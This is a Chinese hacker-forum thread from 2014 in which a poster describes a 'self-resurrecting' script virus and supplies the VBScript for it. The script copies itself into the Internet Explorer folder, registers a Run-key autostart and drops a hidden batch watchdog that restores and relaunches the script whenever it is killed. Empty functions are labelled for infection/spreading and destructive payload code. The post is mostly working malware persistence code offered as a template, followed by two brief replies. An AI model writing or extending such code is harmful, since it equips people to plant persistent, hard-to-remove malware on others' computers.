搜索
查看: 276|回复: 2

简单的脚本病毒自我复活思路

[复制链接]
me17 该用户已被删除
发表于 2014-10-23 22:23:20 | 显示全部楼层 |阅读模式
判断是否是第一次运行,如果是第一次运行就把自己复制进ie目录,并且加入启动项,结束。

下一次开机运行后。创建一个批处理监控程序,作用是备份病毒的代码、监控病毒是否正常运行,若没有运行,就用备份的代码创建一个新病毒并运行。

非常傻得一个东西、报毒是肯定的,因为往注册表添加启动项了。只是一个简单的病毒思想嘛,按照这个原理,可以继续创建第二个监控程序,监控第一个监控程序的运行,甚至更多。


  1. [color=#ff00][font=Tahoma,]On Error Resume Next[/font][/color]
  2. [color=#ff00][font=Tahoma,]set xfso=createobject("scripting.filesystemobject")[/font][/color]
  3. [color=#ff00][font=Tahoma,]set xwsh=createobject("wscript.shell")[/font][/color]
  4. [color=#ff00][font=Tahoma,]if xfso.fileexists("C:\Program Files\Internet Explorer\sys.vbs")=false then[/font][/color]
  5. [color=#ff00][font=Tahoma,]    xfso.copyfile wscript.scriptfullname,"C:\Program Files\Internet Explorer\sys.vbs",true[/font][/color]
  6. [color=#ff00][font=Tahoma,]    xwsh.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\open","C:\Program Files\Internet Explorer\sys.vbs"[/font][/color]
  7. [color=#ff00][font=Tahoma,]    wscript.quit[/font][/color]
  8. [color=#ff00][font=Tahoma,]end if[/font][/color]
  9. [color=#ff00][font=Tahoma,]set x1=xfso.opentextfile("C:\Program Files\Internet Explorer\ie.bat",2,true)[/font][/color]
  10. [color=#ff00][font=Tahoma,]x1.writeline "@echo off"[/font][/color]
  11. [color=#ff00][font=Tahoma,]x1.writeline "type sys.vbs > system.txt"[/font][/color]
  12. [color=#ff00][font=Tahoma,]x1.writeline ":loop"[/font][/color]
  13. [color=#ff00][font=Tahoma,]x1.writeline "tasklist | find /i " & chr(34) & "wscript.exe" & chr(34) & "||goto :a"[/font][/color]
  14. [color=#ff00][font=Tahoma,]x1.writeline "ping -n 5 127.1>nul"[/font][/color]
  15. [color=#ff00][font=Tahoma,]x1.writeline "goto :loop"[/font][/color]
  16. [color=#ff00][font=Tahoma,]x1.writeline ":a"[/font][/color]
  17. [color=#ff00][font=Tahoma,]x1.writeline "type system.txt > sys.vbs"[/font][/color]
  18. [color=#ff00][font=Tahoma,]x1.writeline "sys.vbs"[/font][/color]
  19. [color=#ff00][font=Tahoma,]x1.writeline "ping -n 5 127.1>nul"[/font][/color]
  20. [color=#ff00][font=Tahoma,]x1.writeline "goto :loop"[/font][/color]
  21. [color=#ff00][font=Tahoma,]x1.close[/font][/color]
  22. [color=#ff00][font=Tahoma,]xwsh.run "ie.bat",0[/font][/color]
  23. [color=#ff00][font=Tahoma,]copy()[/font][/color]
  24. [color=#ff00][font=Tahoma,]dead()[/font][/color]
  25. [color=#ff00][font=Tahoma,]xwsh.run "sys.vbs"[/font][/color]

  26. [color=#ff00][font=Tahoma,]function copy()[/font][/color]
  27. [color=#ff00][font=Tahoma,]'感染和传播代码[/font][/color]
  28. [color=#ff00][font=Tahoma,]end function[/font][/color]

  29. [color=#ff00][font=Tahoma,]function dead()[/font][/color]
  30. [color=#ff00][font=Tahoma,]'破坏代码[/font][/color]
  31. [color=#ff00][font=Tahoma,]end function[/font][/color]
  32. [color=#ff00][font=Tahoma,]
复制代码

me17 该用户已被删除
 楼主| 发表于 2014-10-24 10:06:54 来自手机 | 显示全部楼层
我先沙发了
wuzhonyu 该用户已被删除
发表于 2014-10-24 13:20:17 | 显示全部楼层
学习了!!!!抢沙发
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表